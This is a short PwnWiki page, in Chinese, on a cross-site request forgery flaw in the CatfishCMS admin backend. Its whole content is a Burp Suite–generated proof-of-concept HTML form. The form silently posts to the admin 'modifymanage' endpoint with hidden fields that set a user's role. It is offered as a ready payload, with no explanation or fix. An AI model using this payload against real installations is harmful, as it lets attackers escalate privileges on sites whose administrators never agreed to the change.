CatfishCMS 後臺CSRF漏洞

From PwnWiki
Revision as of 10:02, 1 May 2021 by Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://0-sec.org...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Payload

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://0-sec.org/index.php/admin/index/modifymanage.html?c=73" method="POST">
      <input type="hidden" name="uid" value="73" />
      <input type="hidden" name="juese" value="3" />
      <input type="hidden" name="verification" value="05f176843c20e12c1364e80b9869ac17" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Retrieved from "https://pwnwiki.com/index.php?title=CatfishCMS_後臺CSRF漏洞&oldid=1989"